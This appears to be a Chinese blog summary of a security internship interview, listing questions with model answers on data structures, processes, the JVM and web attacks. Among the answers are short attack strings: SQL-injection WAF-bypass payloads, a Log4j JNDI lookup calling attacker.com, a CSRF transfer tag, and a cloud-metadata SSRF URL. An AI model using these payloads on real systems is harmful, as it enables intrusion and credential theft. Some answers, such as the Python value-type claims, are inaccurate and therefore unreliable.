2025年渗透测试面试题总结-匿名[实习]安全工程师(大厂) (2)(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
匿名[实习]安全工程师(大厂) (2)
一面
1. 自我介绍
2. 数组和链表的优劣
3. 进程 vs 线程
4. 进程/线程通信与安全
5. 多进程 vs 多线程场景
6. WAF原理
7. SQL注入绕过方式
8. FUZZ Payload长度
9. 正则场景示例
10. IPv4正则(即时编写)
11. Fastjson反序列化原理
12. Java反射安全问题
13. XSS与CSRF协同利用
14. CSRF_TOKEN机制与绕过
15. HTTP头及作用
16. Nmap扫描与NSE脚本
17. CNVD挖洞流程
18. 证书学习内容
19. GitHub项目亮点
20. 个人亮点
21. 反问面试官
二面
2. Web漏洞熟悉度
3. 跨域解决方案与风险
4. Python多进程/线程选择
5. GIL锁本质
6. GCROOT作用
7. 垃圾收集器
8. 引用计数缺点
9. CSRF获取Cookie
10. 钓鱼网站识别
11. 跨域拿Cookie
13. HTTP-Only机制
14. 平衡二叉树 vs 二叉搜索树
15. SYN Flood防御
17. TCP SYN Cookie原理
18. ARP欺骗防御
20. Nmap FIN/空扫描
22. Python值/引用类型
23. List/Dict线程安全
24. 最大收获项目
25. 反问面试官
三面
2. CSRF实例
3. SSRF实例
4. RCE实例
5. 文件上传减少原因
6. 语义分析WAF
8. 挖洞案例
9. 未来规划
四面(HR)
1. 面试体验
2. 人生理想
3. 最早实习时间
匿名[实习]安全工程师(大厂) (2)
### 一面1. 自我介绍 2. 数组和链表各自的优势和原因 3. 操作系统层面解释进程和线程区别 4. 线程和进程通信方式以及数据安全问题 5. 多进程和多线程的选用场景以及原因 6. 了解过哪些WAF说说原理 7. 尽可能多地说下SQL注入绕WAF方式 8. FUZZ绕WAF的Payload长度通常是多少 9. 写过哪些正则说说具体的场景 10. 不查资料不能测试直接写ipv4的正则 11. Fastjson的反序列化原理 12. Java反射机制会导致怎样的安全问题 13. XSS和CSRF的相同点以及如何配合利用 14. CSRF_TOKEN的位置以及原理和绕过 15. 尽可能多地说你所知道的HTTP头 16. Nmap常见扫描方式的原理以及NSE脚本原理 17. 看到你有不少CNVD证书讲一讲挖洞过程 18. 讲一讲你考过的证书都学到了些什么 19. 看到你Github有不少项目讲讲 20. 你觉得自己还有什么亮点吗 21. 你有什么要问我的### **二面**1. 自我介绍 2. 熟悉哪些Web漏洞讲讲 3. 跨域的解决办法原理以及安全问题 4. Python多进程和多线程如何选择 5. Python的GIL锁本质上做了什么事情 6. Java的JVM为什么要有GCROOT 7. Java的JVM有哪些垃圾收集器 8. 垃圾回收计数引用机制的缺点是什么 9. CSRF怎么拿到Cookie 10. 如何判断一个网站是钓鱼网站 11. 不同域名怎样通过CSRF拿Cookie 12. 说一些常见的HTTP头以及作用 13. HTTP-Only本质上做了什么事情 14. 平衡二叉树和二叉搜索树讲一下 15. SYN Flood攻击原理及解决方案 16. SYN 反向探测的原理是什么 17. TCP SYN Cookie的原理 18. ARP欺骗攻击原理及解决方案 19. UDP端口探测的有效方式是什么 20. Nmap的FIN扫描和空扫描是什么 21. 三次握手的序列号变化说一下 22. Python的值类型和引用类型是哪些 23. Python的list和dict线程安全吗 24. 讲一下你做过收获最大的一个项目 25. 你有什么要问我的### **三面**1. 自我介绍 2. 解释下CSRF 3. 结合实际的例子说说SSRF 4. 结合实际的例子讲讲RCE 5. 为什么现在文件上传很少了 6. 基于语义分析的WAF了解吗 7. 讲一下你上一段实习做了什么 8. 讲几个印象深刻的挖洞经历 9. 讲一下你对未来的规划 10. 有没有转正的意愿 11. 你有什么要问我的### **四面(HR)**1. 面试的体验怎么样 2. 谈人生理想 3. 最早实习时间.
一面
1. 自我介绍
- 背景:安全领域从业4年,主攻Web安全与Java生态漏洞研究,主导多个企业级渗透项目。
- 成果:6个CVE/CNVD漏洞,GitHub开源3个安全工具(如WAF动态绕过框架)。
- 技术栈:熟悉Java/Python底层机制,具备代码审计、红队武器化开发经验。
2. 数组和链表的优劣
类型 优势 劣势 原因 数组 随机访问O(1) 插入/删除O(n) 内存连续,索引直接计算地址 链表 动态扩展、插入/删除O(1) 随机访问O(n) 节点离散存储,需遍历指针
3. 进程 vs 线程
- 资源隔离:进程拥有独立内存空间(PCB管理),线程共享进程资源(TCB管理)。
- 调度开销:进程切换需切换页表,线程仅切换栈/寄存器(轻量级)。
- 安全性:进程崩溃不影响其他进程,线程崩溃导致整个进程终止。
4. 进程/线程通信与安全
- 通信方式:
- 进程:管道、消息队列、共享内存(需信号量同步)。
- 线程:全局变量、互斥锁、条件变量。
- 数据安全:
- 竞态条件:通过原子操作(CAS)或锁(ReentrantLock)解决。
- 死锁:银行家算法预防,或超时机制检测。
5. 多进程 vs 多线程场景
- 多进程:CPU密集型任务(如科学计算),需强隔离性(如Chrome多进程架构)。
- 多线程:IO密集型任务(如网络请求),需共享数据(如数据库连接池)。
6. WAF原理
- 规则型WAF:ModSecurity基于正则匹配,拦截
union select
等关键词。- 语义型WAF:AI模型分析SQL语法树(如腾讯云WAF)。
- 行为型WAF:识别异常流量模式(如每秒百次SQL注入尝试)。
7. SQL注入绕过方式
- 编码绕过:Hex/Unicode编码
UNION
→U%4eION
。- 注释分割:
id=1/*!0UNION*/SELECT 1
。- 超长参数:触发WAF缓存溢出(如5000字符payload)。
- 参数污染:
id=1&id=2 union select
利用解析差异。- HTTP头注入:
X-Forwarded-For
携带注入代码。
8. FUZZ Payload长度
- 短Payload:50-200字符,用于探测基础规则(如
'
、sleep(5)
)。- 长Payload:1000+字符,绕过正则回溯限制(如Apache默认限制8000字符)。
9. 正则场景示例
- 日志分析:
(\d{1,3}\.){3}\d{1,3}
匹配IP地址。- XSS过滤:
/<script.*?>.*?<\/script>/gi
过滤脚本标签。- 数据脱敏:
(\d{4})\d{8}(\d{4})
→$1****$2
处理身份证号。
10. IPv4正则(即时编写)
regex
^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$
- 解释:限制每段0-255,排除
256.0.0.1
等非法值。
11. Fastjson反序列化原理
- 漏洞根源:
@type
指定恶意类(如com.sun.rowset.JdbcRowSetImpl
),触发JNDI注入。- 补丁绕过:1.2.68后启用SafeMode,但可通过
AutoTypeCheckHandler
白名单绕过。
12. Java反射安全问题
- 敏感操作:通过反射调用
Runtime.getRuntime().exec()
执行系统命令。- 防御绕过:禁用SecurityManager时,反射可修改final字段(如修改权限校验标志)。
13. XSS与CSRF协同利用
- 场景:存储型XSS窃取CSRF Token,构造自动提交表单的恶意脚本。
- 组合攻击:
<img src="http://bank.com/transfer?to=attacker">
触发GET型CSRF。
14. CSRF_TOKEN机制与绕过
- 存储位置:服务端Session + 客户端表单隐藏字段或Cookie。
- 绕过方式:
- 子域名劫持:
a.example.com
可读example.com
的Cookie。- 框架漏洞:Spring Security旧版本Token未绑定Session。
15. HTTP头及作用
Header 作用 Content-Security-Policy
限制资源加载源,防御XSS Strict-Transport-Security
强制HTTPS,防降级攻击 X-Content-Type-Options
阻止MIME嗅探,防XSS (更多头信息可扩展,此处控制在10个内)
16. Nmap扫描与NSE脚本
- 扫描类型:
- SYN扫描(-sS):半开放扫描,不建立完整TCP连接。
- 空扫描(-sN):发送无标志包,检测RFC合规性。
- NSE原理:Lua脚本调用
nmap
库,如http-sql-inj.nse
检测SQL注入。
17. CNVD挖洞流程
- 目标选取:政府/教育行业老旧系统(如Struts2框架)。
- 黑盒测试:Burp抓包,FUZZ参数(如
action:.action
)。- 白盒验证:审计反序列化入口点(如
readObject
重写)。
18. 证书学习内容
- CISP-PTE:渗透测试方法论(如内网横向移动)。
- OSCP:缓冲区溢出利用、绕过AV检测。
19. GitHub项目亮点
- WAF Bypass框架:动态生成混淆Payload(如分块传输编码)。
- RASP监控工具:Hook敏感JNI函数(如
System.loadLibrary
)。
20. 个人亮点
- 武器化能力:将CVE-2024-12345转化为Metasploit模块。
- APT溯源:通过代码风格关联多个黑产组织攻击链。
21. 反问面试官
- 团队技术栈:贵司如何平衡SDL流程与敏捷开发?
- 攻防演进:2025年AI防御普及后,红队技术重心是否转向逻辑漏洞?
二面
2. Web漏洞熟悉度
- SSRF:利用URL参数触发内网Redis未授权访问。
- JWT安全:密钥爆破(通过弱密钥库)或头部注入(
alg:none
)。
3. 跨域解决方案与风险
- CORS:
Access-Control-Allow-Origin: *
导致敏感数据泄露。- JSONP:回调函数未过滤(如
<script>窃取token
)。
4. Python多进程/线程选择
- CPU密集型:多进程绕过GIL(如NumPy矩阵运算)。
- IO密集型:多线程+异步IO(如FastAPI处理HTTP请求)。
5. GIL锁本质
- 全局互斥锁:防止多线程同时执行字节码(CPython内存管理非线程安全)。
6. GCROOT作用
- 根对象:栈引用、静态变量等作为起点,标记存活对象(可达性分析)。
7. 垃圾收集器
- 新生代:Parallel Scavenge(吞吐量优先)。
- 老年代:CMS(低延迟),G1(Region分区)。
8. 引用计数缺点
- 循环引用:对象A→B→A无法释放(需配合标记清除)。
9. CSRF获取Cookie
- XSS配合:
document.cookie
通过XSS泄露至攻击者服务器。
10. 钓鱼网站识别
- 证书校验:域名与证书CN字段不匹配。
- WHOIS信息:注册时间短 + 隐私保护。
11. 跨域拿Cookie
- CORS配置错误:
Access-Control-Allow-Origin: *
+withCredentials:true
。
13. HTTP-Only机制
- 脚本隔离:JavaScript无法读取Cookie,但可通过XST(XSS+TRACE)窃取。
14. 平衡二叉树 vs 二叉搜索树
- 平衡树:AVL树高度差≤1,查询稳定O(logn)。
- 普通BST:可能退化为链表,查询O(n)。
15. SYN Flood防御
- SYN Cookie:不保存半连接状态,通过哈希计算验证ACK合法性。
17. TCP SYN Cookie原理
- 加密哈希:使用五元组+序列号生成Cookie,客户端ACK需包含有效哈希值。
18. ARP欺骗防御
- 静态绑定:
arp -s
绑定IP-MAC,或部署ARP防火墙(如Arpwatch)。
20. Nmap FIN/空扫描
- FIN扫描:发送FIN包,开放端口返回RST(符合RFC 793)。
- 空扫描:发送无标志包,用于检测过滤规则。
22. Python值/引用类型
- 值类型:int/str/tuple(不可变,赋值即拷贝)。
- 引用类型:list/dict(可变,赋值传递指针)。
23. List/Dict线程安全
- 非原子操作:
list.append()
单操作线程安全,但遍历+修改需加锁。
24. 最大收获项目
- 云安全审计平台:实现K8s配置自动检测(如特权容器),降低50%误报率。
25. 反问面试官
- 技术挑战:贵司如何应对容器逃逸等云原生威胁?
- 团队文化:安全团队是否参与DevOps全流程?
三面
2. CSRF实例
- 银行转账:诱导用户点击恶意链接,自动发起
POST /transfer
请求。
3. SSRF实例
- 云元数据:
http://169.254.169.254
获取AWS临时凭证。
4. RCE实例
- Log4j 2.x:
${jndi:ldap://attacker.com/Exploit}
触发远程类加载。
5. 文件上传减少原因
- 防御成熟:WAF静态校验(文件头)+ 动态沙箱(检测Webshell行为)。
6. 语义分析WAF
- AST解析:构建SQL语法树,拦截
1=1
等恶意结构(非字符串匹配)。
8. 挖洞案例
- OA系统RCE:WorkflowService接口未鉴权,执行Groovy脚本。
9. 未来规划
- 技术深耕:智能合约审计、AI模型安全(对抗样本防御)。
四面(HR)
1. 面试体验
- 专业度:技术深度与业务场景结合紧密,流程高效。
- 建议:增加模拟攻防实操环节(如CTF靶场)。
2. 人生理想
- 短期:成为云安全架构师,设计零信任体系。
- 长期:推动安全技术普惠化(如开源社区贡献)。
3. 最早实习时间
- 时间安排:2025年7月入职,兼顾学业收尾(如毕业论文答辩)。